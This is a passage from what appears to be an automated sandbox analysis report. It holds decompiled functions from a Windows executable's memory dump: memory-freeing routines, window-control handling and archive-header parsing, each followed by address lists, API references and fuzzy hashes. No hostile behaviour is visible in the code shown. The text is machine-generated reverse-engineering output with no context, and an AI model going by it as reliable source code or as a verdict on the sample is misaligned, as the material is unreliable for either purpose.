							E0018BE12( *_t5);
						}
						_t6 = _t74 + 0x80; // 0x79726f6d
						_t47 =  *_t6;
						if(_t47 != 0 &&  *_t47 == 0) {
							E001884DE(_t47);
							_t7 = _t74 + 0x88; // 0x720043
							E0018BF10( *_t7);
						}
						_t8 = _t74 + 0x7c; // 0x654d7463
						E001884DE( *_t8);
						_t9 = _t74 + 0x88; // 0x720043
						E001884DE( *_t9);
					}
				}
				_t10 = _t74 + 0x8c; // 0x700079
				_t26 =  *_t10;
				if(_t26 != 0 &&  *_t26 == 0) {
					_t11 = _t74 + 0x90; // 0x500074
					E001884DE( *_t11 - 0xfe);
					_t12 = _t74 + 0x94; // 0x6f0072
					E001884DE( *_t12 - 0x80);
					_t13 = _t74 + 0x98; // 0x650074
					E001884DE( *_t13 - 0x80);
					_t14 = _t74 + 0x8c; // 0x700079
					E001884DE( *_t14);
				}
				_t15 = _t74 + 0x9c; // 0x740063
				E0018C3A6( *_t15);
				_t28 = 6;
				_t16 = _t74 + 0xa0; // 0x1939f8
				_t55 = _t16;
				_v8 = _t28;
				_t18 = _t74 + 0x28; // 0x193980
				_t70 = _t18;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x19e818) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E001884DE(_t31);
							E001884DE( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t22 = _t70 - 4; // 0x0
						_t29 =  *_t22;
						if(_t29 != 0 &&  *_t29 == 0) {
							E001884DE(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E001884DE(_t74);
			}

0x0018c23b
0x0018c23f
0x0018c23f
0x0018c247
0x0018c250
0x0018c250
0x0018c255
0x0018c25c
0x0018c25c
0x0018c264
0x0018c26c
0x0018c271
0x0018c277
0x0018c27d
0x0018c27e
0x0018c27e
0x0018c286
0x0018c28e
0x0018c293
0x0018c299
0x0018c29f
0x0018c2a0
0x0018c2a3
0x0018c2a8
0x0018c2ae
0x0018c2b4
0x0018c255
0x0018c2b5
0x0018c2b5
0x0018c2bd
0x0018c2c4
0x0018c2d0
0x0018c2d5
0x0018c2e3
0x0018c2e8
0x0018c2f1
0x0018c2f6
0x0018c2fc
0x0018c301
0x0018c304
0x0018c30a
0x0018c312
0x0018c313
0x0018c313
0x0018c319
0x0018c31c
0x0018c31c
0x0018c31f
0x0018c326
0x0018c328
0x0018c32c
0x0018c334
0x0018c33b
0x0018c341
0x0018c342
0x0018c342
0x0018c349
0x0018c34b
0x0018c34b
0x0018c350
0x0018c358
0x0018c35d
0x0018c35e
0x0018c35e
0x0018c361
0x0018c364
0x0018c367
0x0018c36a
0x0018c36a
0x0018c37c

APIs

___free_lconv_mon.LIBCMT ref: 0018C277

Part of subcall function 0018BE12: _free.LIBCMT ref: 0018BE2F
Part of subcall function 0018BE12: _free.LIBCMT ref: 0018BE41
Part of subcall function 0018BE12: _free.LIBCMT ref: 0018BE53
Part of subcall function 0018BE12: _free.LIBCMT ref: 0018BE65
Part of subcall function 0018BE12: _free.LIBCMT ref: 0018BE77
Part of subcall function 0018BE12: _free.LIBCMT ref: 0018BE89
Part of subcall function 0018BE12: _free.LIBCMT ref: 0018BE9B
Part of subcall function 0018BE12: _free.LIBCMT ref: 0018BEAD
Part of subcall function 0018BE12: _free.LIBCMT ref: 0018BEBF
Part of subcall function 0018BE12: _free.LIBCMT ref: 0018BED1
Part of subcall function 0018BE12: _free.LIBCMT ref: 0018BEE3
Part of subcall function 0018BE12: _free.LIBCMT ref: 0018BEF5
Part of subcall function 0018BE12: _free.LIBCMT ref: 0018BF07

_free.LIBCMT ref: 0018C26C

Part of subcall function 001884DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0018BFA7,00193958,00000000,00193958,00000000,?,0018BFCE,00193958,00000007,00193958,?,0018C3CB,00193958), ref: 001884F4
Part of subcall function 001884DE: GetLastError.KERNEL32(00193958,?,0018BFA7,00193958,00000000,00193958,00000000,?,0018BFCE,00193958,00000007,00193958,?,0018C3CB,00193958,00193958), ref: 00188506

_free.LIBCMT ref: 0018C28E
_free.LIBCMT ref: 0018C2A3
_free.LIBCMT ref: 0018C2AE
_free.LIBCMT ref: 0018C2D0
_free.LIBCMT ref: 0018C2E3
_free.LIBCMT ref: 0018C2F1
_free.LIBCMT ref: 0018C2FC
_free.LIBCMT ref: 0018C334
_free.LIBCMT ref: 0018C33B
_free.LIBCMT ref: 0018C358
_free.LIBCMT ref: 0018C370

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: cb8c1bf3f94f84968c6cf4a709f385330c5490f749ca07e100a0af9827821488
Instruction ID: 4c5981dbef8f2b657dbdbb76bc2a5e079d39909d96dc95b8d3ef74962eacdf3f
Opcode Fuzzy Hash: cb8c1bf3f94f84968c6cf4a709f385330c5490f749ca07e100a0af9827821488
Instruction Fuzzy Hash: 5F317A326006059FEB20BE78D945B5AB3EAFF10310F54842AF849D7591DF31AE81DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0017CD2E, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0017CD2E(void* __ecx, void* __edx, void* __eflags, void* __fp0, short _a24, struct HWND__* _a4124) {
				void _v0;
				intOrPtr _v4;
				intOrPtr _v12;
				struct HWND__* _t8;
				void* _t18;
				void* _t25;
				void* _t27;
				void* _t29;
				struct HWND__* _t32;
				struct HWND__* _t35;
				void* _t48;

				_t48 = __fp0;
				_t27 = __edx;
				E0017E360();
				_t8 = E00179D1A(__eflags);
				if(_t8 == 0) {
					L12:
					return _t8;
				}
				_t8 = GetWindow(_a4124, 5);
				_t32 = _t8;
				_t29 = 0;
				_t35 = _t32;
				if(_t32 == 0) {
					L11:
					goto L12;
				}
				while(_t29 < 0x200) {
					GetClassNameW(_t32,  &_a24, 0x800);
					if(E001717AC( &_a24, L"STATIC") == 0 && (GetWindowLongW(_t32, 0xfffffff0) & 0x0000001f) == 0xe) {
						_t25 = SendMessageW(_t32, 0x173, 0, 0);
						if(_t25 != 0) {
							GetObjectW(_t25, 0x18,  &_v0);
							_t18 = E00179D5A(_v4);
							SendMessageW(_t32, 0x172, 0, E00179F5D(_t27, _t48, _t25, E00179D39(_v12), _t18));
							DeleteObject(_t25);
						}
					}
					_t8 = GetWindow(_t32, 2);
					_t32 = _t8;
					if(_t32 != _t35) {
						_t29 = _t29 + 1;
						if(_t32 != 0) {
							continue;
						}
					}
					break;
				}
				goto L11;
			}

0x0017cd2e
0x0017cd2e
0x0017cd33
0x0017cd38
0x0017cd3f
0x0017ce16
0x0017ce1c
0x0017ce1c
0x0017cd51
0x0017cd57
0x0017cd59
0x0017cd5b
0x0017cd5f
0x0017ce13
0x00000000
0x0017ce15
0x0017cd66
0x0017cd7d
0x0017cd94
0x0017cdb6
0x0017cdba
0x0017cdc4
0x0017cdce
0x0017cded
0x0017cdf4
0x0017cdf4
0x0017cdba
0x0017cdfd
0x0017ce03
0x0017ce07
0x0017ce09
0x0017ce0c
0x00000000
0x00000000
0x0017ce0c
0x00000000
0x0017ce07
0x00000000

APIs

GetWindow.USER32(?,00000005), ref: 0017CD51
GetClassNameW.USER32(00000000,?,00000800), ref: 0017CD7D

Part of subcall function 001717AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0016BB05,00000000,.exe,?,?,00000800,?,?,001785DF,?), ref: 001717C2

GetWindowLongW.USER32(00000000,000000F0), ref: 0017CD99
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0017CDB0
GetObjectW.GDI32(00000000,00000018,?), ref: 0017CDC4
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0017CDED
DeleteObject.GDI32(00000000), ref: 0017CDF4
GetWindow.USER32(00000000,00000002), ref: 0017CDFD

Strings

STATIC, xrefs: 0017CD83

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: df775c029e2cc1b946873fa00784561d9c102f8d2dc43e8e430b5942eb4b5420
Instruction ID: bf4e395ea58656c913274b01cd982caef756edebaa0d55d5de3ce11c549a0413
Opcode Fuzzy Hash: df775c029e2cc1b946873fa00784561d9c102f8d2dc43e8e430b5942eb4b5420
Instruction Fuzzy Hash: 2711E432540311BBE6316BA0DC0AFAF3E7CBB65741F008425FA5AA5092CB74C95686E4

Uniqueness

Uniqueness Score: -1.00%

Function 00188EB1, Relevance: 15.1, APIs: 10, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00188EB1(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0x195ed0) {
					E001884DE(_t52);
					_t26 = _a4;
				}
				E001884DE( *((intOrPtr*)(_t26 + 0x3c)));
				E001884DE( *((intOrPtr*)(_a4 + 0x30)));
				E001884DE( *((intOrPtr*)(_a4 + 0x34)));
				E001884DE( *((intOrPtr*)(_a4 + 0x38)));
				E001884DE( *((intOrPtr*)(_a4 + 0x28)));
				E001884DE( *((intOrPtr*)(_a4 + 0x2c)));
				E001884DE( *((intOrPtr*)(_a4 + 0x40)));
				E001884DE( *((intOrPtr*)(_a4 + 0x44)));
				E001884DE( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E00188D76(5,  &_v8);
				_v8 =  &_a4;
				return E00188DC6(4,  &_v8);
			}

0x00188eb7
0x00188eba
0x00188ec2
0x00188ec5
0x00188eca
0x00188ecd
0x00188ed1
0x00188edc
0x00188ee7
0x00188ef2
0x00188efd
0x00188f08
0x00188f13
0x00188f1e
0x00188f2c
0x00188f34
0x00188f3d
0x00188f45
0x00188f59

APIs

_free.LIBCMT ref: 00188EC5

Part of subcall function 001884DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0018BFA7,00193958,00000000,00193958,00000000,?,0018BFCE,00193958,00000007,00193958,?,0018C3CB,00193958), ref: 001884F4
Part of subcall function 001884DE: GetLastError.KERNEL32(00193958,?,0018BFA7,00193958,00000000,00193958,00000000,?,0018BFCE,00193958,00000007,00193958,?,0018C3CB,00193958,00193958), ref: 00188506

_free.LIBCMT ref: 00188ED1
_free.LIBCMT ref: 00188EDC
_free.LIBCMT ref: 00188EE7
_free.LIBCMT ref: 00188EF2
_free.LIBCMT ref: 00188EFD
_free.LIBCMT ref: 00188F08
_free.LIBCMT ref: 00188F13
_free.LIBCMT ref: 00188F1E
_free.LIBCMT ref: 00188F2C

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: e276efd03406df0619330bc4be7d25d0766a5122a846833ef65e26c59cf61a98
Instruction ID: 0b684c66b74f83ab6526ed1efdb9447418797f1da0231870ef35bf61978eb150
Opcode Fuzzy Hash: e276efd03406df0619330bc4be7d25d0766a5122a846833ef65e26c59cf61a98
Instruction Fuzzy Hash: E211A27651010DAFCB11FF94C942DDA3BA6FF14350B9181A5BA088B626DB32EF51DF80

Uniqueness

Uniqueness Score: -1.00%

Function 00162162, Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00162162(intOrPtr __ecx) {
				signed int _t135;
				void* _t137;
				signed int _t139;
				unsigned int _t140;
				signed int _t144;
				signed int _t161;
				signed int _t164;
				void* _t167;
				void* _t172;
				signed int _t175;
				signed char _t178;
				signed char _t179;
				signed char _t180;
				signed int _t182;
				signed int _t185;
				signed int _t187;
				signed int _t188;
				signed char _t220;
				signed char _t232;
				signed int _t233;
				signed int _t236;
				intOrPtr _t240;
				signed int _t244;
				signed int _t246;
				signed int _t247;
				signed int _t257;
				signed int _t258;
				signed char _t262;
				signed int _t263;
				signed int _t265;
				intOrPtr _t272;
				intOrPtr _t275;
				intOrPtr _t278;
				intOrPtr _t314;
				signed int _t315;
				intOrPtr _t318;
				signed int _t322;
				void* _t323;
				void* _t324;
				void* _t326;
				void* _t327;
				void* _t328;
				void* _t329;
				void* _t330;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;
				intOrPtr* _t336;
				signed int _t339;
				void* _t340;
				signed int _t341;
				char* _t342;
				void* _t343;
				void* _t344;
				signed int _t348;
				signed int _t351;
				signed int _t366;

				E0017E360();
				_t318 =  *((intOrPtr*)(_t344 + 0x20b8));
				 *((intOrPtr*)(_t344 + 0xc)) = __ecx;
				_t314 =  *((intOrPtr*)(_t318 + 0x18));
				_t135 = _t314 -  *((intOrPtr*)(_t344 + 0x20bc));
				if(_t135 <  *(_t318 + 0x1c)) {
					L104:
					return _t135;
				}
				_t315 = _t314 - _t135;
				 *(_t318 + 0x1c) = _t135;
				if(_t315 >= 2) {
					_t240 =  *((intOrPtr*)(_t344 + 0x20c4));
					while(1) {
						_t135 = E0016C6E0(_t315);
						_t244 = _t135;
						_t348 = _t315;
						if(_t348 < 0 || _t348 <= 0 && _t244 == 0) {
							break;
						}
						_t322 =  *(_t318 + 0x1c);
						_t135 =  *((intOrPtr*)(_t318 + 0x18)) - _t322;
						if(_t135 == 0) {
							break;
						}
						_t351 = _t315;
						if(_t351 > 0 || _t351 >= 0 && _t244 > _t135) {
							break;
						} else {
							_t339 = _t322 + _t244;
							 *(_t344 + 0x28) = _t339;
							_t137 = E0016C6E0(_t315);
							_t340 = _t339 -  *(_t318 + 0x1c);
							_t323 = _t137;
							_t135 = _t315;
							_t246 = 0;
							 *(_t344 + 0x24) = _t135;
							 *(_t344 + 0x20) = 0;
							if(0 < 0 || 0 <= 0 && _t340 < 0) {
								break;
							} else {
								if( *((intOrPtr*)(_t240 + 4)) == 1 && _t323 == 1 && _t135 == 0) {
									 *((char*)(_t240 + 0x1e)) = 1;
									_t232 = E0016C6E0(_t315);
									 *(_t344 + 0x1c) = _t232;
									if((_t232 & 0x00000001) != 0) {
										_t236 = E0016C6E0(_t315);
										if((_t236 | _t315) != 0) {
											asm("adc eax, edx");
											 *((intOrPtr*)(_t240 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca0)) + _t236;
											 *((intOrPtr*)(_t240 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca4));
										}
										_t232 =  *(_t344 + 0x1c);
									}
									if((_t232 & 0x00000002) != 0) {
										_t233 = E0016C6E0(_t315);
										if((_t233 | _t315) != 0) {
											asm("adc eax, edx");
											 *((intOrPtr*)(_t240 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca0)) + _t233;
											 *((intOrPtr*)(_t240 + 0x34)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca4));
										}
									}
									_t246 =  *(_t344 + 0x20);
									_t135 =  *(_t344 + 0x24);
								}
								if( *((intOrPtr*)(_t240 + 4)) == 2 ||  *((intOrPtr*)(_t240 + 4)) == 3) {
									_t366 = _t135;
									if(_t366 > 0 || _t366 >= 0 && _t323 > 7) {
										goto L102;
									} else {
										_t324 = _t323 - 1;
										if(_t324 == 0) {
											_t139 = E0016C6E0(_t315);
											__eflags = _t139;
											if(_t139 == 0) {
												_t140 = E0016C6E0(_t315);
												 *(_t240 + 0x10c1) = _t140 & 0x00000001;
												 *(_t240 + 0x10ca) = _t140 >> 0x00000001 & 0x00000001;
												_t144 = E0016C593(_t318) & 0x000000ff;
												 *(_t240 + 0x10ec) = _t144;
												__eflags = _t144 - 0x18;
												if(_t144 > 0x18) {
													E0016400A(_t344 + 0x38, 0x14, L"xc%u", _t144);
													_t257 =  *(_t344 + 0x28);
													_t167 = _t344 + 0x40;
													_t344 = _t344 + 0x10;
													E00163FB5(_t257, _t240 + 0x28, _t167);
												}
												E0016C642(_t318, _t240 + 0x10a1, 0x10);
												E0016C642(_t318, _t240 + 0x10b1, 0x10);
												__eflags =  *(_t240 + 0x10c1);
												if( *(_t240 + 0x10c1) != 0) {
													_t325 = _t240 + 0x10c2;
													E0016C642(_t318, _t240 + 0x10c2, 8);
													E0016C642(_t318, _t344 + 0x30, 4);
													E0016F8C7(_t344 + 0x58);
													E0016F90D(_t344 + 0x60, _t240 + 0x10c2, 8);
													_push(_t344 + 0x30);
													E0016F7D6(_t344 + 0x5c);
													_t161 = E0017FDFA(_t344 + 0x34, _t344 + 0x34, 4);
													_t344 = _t344 + 0xc;
													asm("sbb al, al");
													__eflags =  *((intOrPtr*)(_t240 + 4)) - 3;
													 *(_t240 + 0x10c1) =  ~_t161 + 1;
													if( *((intOrPtr*)(_t240 + 4)) == 3) {
														_t164 = E0017FDFA(_t325, 0x193668, 8);
														_t344 = _t344 + 0xc;
														__eflags = _t164;
														if(_t164 == 0) {
															 *(_t240 + 0x10c1) = _t164;
														}
													}
												}
												 *((char*)(_t240 + 0x10a0)) = 1;
												 *((intOrPtr*)(_t240 + 0x109c)) = 5;
												 *((char*)(_t240 + 0x109b)) = 1;
											} else {
												E0016400A(_t344 + 0x38, 0x14, L"x%u", _t139);
												_t258 =  *(_t344 + 0x28);
												_t172 = _t344 + 0x40;
												_t344 = _t344 + 0x10;
												E00163FB5(_t258, _t240 + 0x28, _t172);
											}
											goto L102;
										}
										_t326 = _t324 - 1;
										if(_t326 == 0) {
											_t175 = E0016C6E0(_t315);
											__eflags = _t175;
											if(_t175 != 0) {
												goto L102;
											}
											_push(0x20);
											 *((intOrPtr*)(_t240 + 0x1070)) = 3;
											_push(_t240 + 0x1074);
											L40:
											E0016C642(_t318);
											goto L102;
										}
										_t327 = _t326 - 1;
										if(_t327 == 0) {
											__eflags = _t246;
											if(__eflags < 0) {
												goto L102;
											}
											if(__eflags > 0) {
												L65:
												_t178 = E0016C6E0(_t315);
												 *(_t344 + 0x13) = _t178;
												_t179 = _t178 & 0x00000001;
												_t262 =  *(_t344 + 0x13);
												 *(_t344 + 0x14) = _t179;
												_t315 = _t262 & 0x00000002;
												__eflags = _t315;
												 *(_t344 + 0x15) = _t315;
												if(_t315 != 0) {
													_t278 = _t318;
													__eflags = _t179;
													if(__eflags == 0) {
														E00170DFC(_t240 + 0x1040, _t315, E0016C622(_t278, __eflags), _t315);
													} else {
														E00170DBD(_t240 + 0x1040, _t315, E0016C5E0(_t278), 0);
													}
													_t262 =  *(_t344 + 0x13);
													_t179 =  *(_t344 + 0x14);
												}
												_t263 = _t262 & 0x00000004;
												__eflags = _t263;
												 *(_t344 + 0x16) = _t263;
												if(_t263 != 0) {
													_t275 = _t318;
													__eflags = _t179;
													if(__eflags == 0) {
														E00170DFC(_t240 + 0x1048, _t315, E0016C622(_t275, __eflags), _t315);
													} else {
														E00170DBD(_t240 + 0x1048, _t315, E0016C5E0(_t275), 0);
													}
												}
												_t180 =  *(_t344 + 0x13);
												_t265 = _t180 & 0x00000008;
												__eflags = _t265;
												 *(_t344 + 0x17) = _t265;
												if(_t265 != 0) {
													__eflags =  *(_t344 + 0x14);
													_t272 = _t318;
													if(__eflags == 0) {
														E00170DFC(_t240 + 0x1050, _t315, E0016C622(_t272, __eflags), _t315);
													} else {
														E00170DBD(_t240 + 0x1050, _t315, E0016C5E0(_t272), 0);
													}
													_t180 =  *(_t344 + 0x13);
												}
												__eflags =  *(_t344 + 0x14);
												if( *(_t344 + 0x14) != 0) {
													__eflags = _t180 & 0x00000010;
													if((_t180 & 0x00000010) != 0) {
														__eflags =  *(_t344 + 0x15);
														if( *(_t344 + 0x15) == 0) {
															_t341 = 0x3fffffff;
															_t328 = 0x3b9aca00;
														} else {
															_t187 = E0016C5E0(_t318);
															_t341 = 0x3fffffff;
															_t328 = 0x3b9aca00;
															_t188 = _t187 & 0x3fffffff;
															__eflags = _t188 - 0x3b9aca00;
															if(_t188 < 0x3b9aca00) {
																E00170A7A(_t240 + 0x1040, _t188, 0);
															}
														}
														__eflags =  *(_t344 + 0x16);
														if( *(_t344 + 0x16) != 0) {
															_t185 = E0016C5E0(_t318) & _t341;
															__eflags = _t185 - _t328;
															if(_t185 < _t328) {
																E00170A7A(_t240 + 0x1048, _t185, 0);
															}
														}
														__eflags =  *(_t344 + 0x17);
														if( *(_t344 + 0x17) != 0) {
															_t182 = E0016C5E0(_t318) & _t341;
															__eflags = _t182 - _t328;
															if(_t182 < _t328) {
																E00170A7A(_t240 + 0x1050, _t182, 0);
															}
														}
													}
												}
												goto L102;
											}
											__eflags = _t340 - 5;
											if(_t340 < 5) {
												goto L102;
											}
											goto L65;
										}
										_t329 = _t327 - 1;
										if(_t329 == 0) {
											__eflags = _t246;
											if(__eflags < 0) {
												goto L102;
											}
											if(__eflags > 0) {
												L60:
												E0016C6E0(_t315);
												__eflags = E0016C6E0(_t315);
												if(__eflags != 0) {
													 *((char*)(_t240 + 0x10f3)) = 1;
													E0016400A(_t344 + 0x38, 0x14, L";%u", _t203);
													_t344 = _t344 + 0x10;
													E0016FE2E(__eflags, _t240 + 0x28, _t344 + 0x30, 0x800);
												}
												goto L102;
											}
											__eflags = _t340 - 1;
											if(_t340 < 1) {
												goto L102;
											}
											goto L60;
										}
										_t330 = _t329 - 1;
										if(_t330 == 0) {
											 *((intOrPtr*)(_t240 + 0x1100)) = E0016C6E0(_t315);
											 *(_t240 + 0x2104) = E0016C6E0(_t315) & 0x00000001;
											_t331 = E0016C6E0(_t315);
											 *((char*)(_t344 + 0xc0)) = 0;
											__eflags = _t331 - 0x1fff;
											if(_t331 < 0x1fff) {
												E0016C642(_t318, _t344 + 0xc4, _t331);
												 *((char*)(_t344 + _t331 + 0xc0)) = 0;
											}
											E0016BD20(_t344 + 0xc4, _t344 + 0xc4, 0x2000);
											_push(0x800);
											_push(_t240 + 0x1104);
											_push(_t344 + 0xc8);
											E00171430();
											goto L102;
										}
										_t332 = _t330 - 1;
										if(_t332 == 0) {
											_t220 = E0016C6E0(_t315);
											 *(_t344 + 0x1c) = _t220;
											_t342 = _t240 + 0x2108;
											 *(_t240 + 0x2106) = _t220 >> 0x00000002 & 0x00000001;
											 *(_t240 + 0x2107) = _t220 >> 0x00000003 & 0x00000001;
											 *((char*)(_t240 + 0x2208)) = 0;
											 *_t342 = 0;
											__eflags = _t220 & 0x00000001;
											if((_t220 & 0x00000001) != 0) {
												_t334 = E0016C6E0(_t315);
												__eflags = _t334 - 0xff;
												if(_t334 >= 0xff) {
													_t334 = 0xff;
												}
												E0016C642(_t318, _t342, _t334);
												_t220 =  *(_t344 + 0x1c);
												 *((char*)(_t334 + _t342)) = 0;
											}
											__eflags = _t220 & 0x00000002;
											if((_t220 & 0x00000002) != 0) {
												_t333 = E0016C6E0(_t315);
												__eflags = _t333 - 0xff;
												if(_t333 >= 0xff) {
													_t333 = 0xff;
												}
												_t343 = _t240 + 0x2208;
												E0016C642(_t318, _t343, _t333);
												 *((char*)(_t333 + _t343)) = 0;
											}
											__eflags =  *(_t240 + 0x2106);
											if( *(_t240 + 0x2106) != 0) {
												 *((intOrPtr*)(_t240 + 0x2308)) = E0016C6E0(_t315);
											}
											__eflags =  *(_t240 + 0x2107);
											if( *(_t240 + 0x2107) != 0) {
												 *((intOrPtr*)(_t240 + 0x230c)) = E0016C6E0(_t315);
											}
											 *((char*)(_t240 + 0x2105)) = 1;
											goto L102;
										}
										if(_t332 != 1) {
											goto L102;
										}
										if( *((intOrPtr*)(_t240 + 4)) == 3 &&  *((intOrPtr*)(_t318 + 0x18)) -  *(_t344 + 0x28) == 1) {
											_t340 = _t340 + 1;
										}
										_t336 = _t240 + 0x1028;
										E00162034(_t336, _t340);
										_push(_t340);
										_push( *_t336);
										goto L40;
									}
								} else {
									L102:
									_t247 =  *(_t344 + 0x28);
									 *(_t318 + 0x1c) = _t247;
									_t135 =  *((intOrPtr*)(_t318 + 0x18)) - _t247;
									if(_t135 >= 2) {
										continue;
									}
									break;
								}
							}
						}
					}
				}
			}

0x00162167
0x0016216d
0x00162174
0x00162178
0x0016217d
0x00162187
0x001627de
0x001627e5
0x001627e5
0x0016218d
0x0016218f
0x00162195
0x0016219c
0x001621a5
0x001621a7
0x001621ac
0x001621ae
0x001621b0
0x00000000
0x00000000
0x001621c3
0x001621c6
0x001621c8
0x00000000
0x00000000
0x001621ce
0x001621d0
0x00000000
0x001621e0
0x001621e0
0x001621e5
0x001621e9
0x001621ee
0x001621f1
0x001621f3
0x001621f5
0x001621f7
0x001621fb
0x001621ff
0x00000000
0x0016220f
0x00162213
0x00162224
0x00162228
0x0016222d
0x00162233
0x00162237
0x00162240
0x00162258
0x0016225a
0x0016225d
0x0016225d
0x00162260
0x00162260
0x00162266
0x0016226a
0x00162273
0x0016228b
0x0016228d
0x00162290
0x00162290
0x00162273
0x00162293
0x00162297
0x00162297
0x0016229f
0x001622ab
0x001622ad
0x00000000
0x001622be
0x001622be
0x001622c1
0x00162670
0x00162675
0x00162677
0x001626a7
0x001626b5
0x001626bd
0x001626c8
0x001626cb
0x001626d1
0x001626d4
0x001626e3
0x001626e8
0x001626ec
0x001626f0
0x001626f8
0x001626f8
0x00162708
0x00162718
0x0016271d
0x00162724
0x0016272c
0x00162735
0x00162743
0x0016274d
0x0016275a
0x00162763
0x00162769
0x0016277a
0x0016277f
0x00162784
0x00162788
0x0016278c
0x00162792
0x0016279c
0x001627a1
0x001627a4
0x001627a6
0x001627a8
0x001627a8
0x001627a6
0x00162792
0x001627ae
0x001627b5
0x001627bf
0x00162679
0x00162686
0x0016268b
0x0016268f
0x00162693
0x0016269b
0x0016269b
0x00000000
0x00162677
0x001622c7
0x001622ca
0x00162649
0x0016264e
0x00162650
0x00000000
0x00000000
0x00162656
0x0016265e
0x00162668
0x0016231f
0x00162321
0x00000000
0x00162321
0x001622d0
0x001622d3
0x001624ca
0x001624cc
0x00000000
0x00000000
0x001624d2
0x001624dd
0x001624df
0x001624e4
0x001624e8
0x001624ea
0x001624f0
0x001624f4
0x001624f4
0x001624f7
0x001624fb
0x001624fd
0x001624ff
0x00162501
0x00162525
0x00162503
0x00162511
0x00162511
0x0016252a
0x0016252e
0x0016252e
0x00162532
0x00162532
0x00162535
0x00162539
0x0016253b
0x0016253d
0x0016253f
0x00162563
0x00162541
0x0016254f
0x0016254f
0x0016253f
0x00162568
0x0016256e
0x0016256e
0x00162571
0x00162575
0x00162577
0x0016257c
0x0016257e
0x001625a2
0x00162580
0x0016258e
0x0016258e
0x001625a7
0x001625a7
0x001625ab
0x001625b0
0x001625b6
0x001625b8
0x001625be
0x001625c3
0x001625ec
0x001625f1
0x001625c5
0x001625c7
0x001625cc
0x001625d1
0x001625d6
0x001625d8
0x001625da
0x001625e5
0x001625e5
0x001625da
0x001625f6
0x001625fb
0x00162604
0x00162606
0x00162608
0x00162613
0x00162613
0x00162608
0x00162618
0x0016261d
0x0016262a
0x0016262c
0x0016262e
0x0016263d
0x0016263d
0x0016262e
0x0016261d
0x001625b8
0x00000000
0x001625b0
0x001624d4
0x001624d7
0x00000000
0x00000000
0x00000000
0x001624d7
0x001622d9
0x001622dc
0x0016246d
0x0016246f
0x00000000
0x00000000
0x00162475
0x00162480
0x00162482
0x0016248e
0x00162490
0x001624a0
0x001624aa
0x001624af
0x001624c0
0x001624c0
0x00000000
0x00162490
0x00162477
0x0016247a
0x00000000
0x00000000
0x00000000
0x0016247a
0x001622e2
0x001622e5
0x001623f8
0x00162407
0x00162412
0x00162414
0x0016241c
0x00162422
0x0016242f
0x00162434
0x00162434
0x0016244a
0x0016244f
0x0016245a
0x00162462
0x00162463
0x00000000
0x00162463
0x001622eb
0x001622ee
0x0016232d
0x00162334
0x0016233b
0x00162344
0x00162352
0x00162358
0x0016235f
0x00162363
0x00162365
0x0016236e
0x00162375
0x00162377
0x00162379
0x00162379
0x0016237f
0x00162384
0x00162388
0x00162388
0x0016238c
0x0016238e
0x00162397
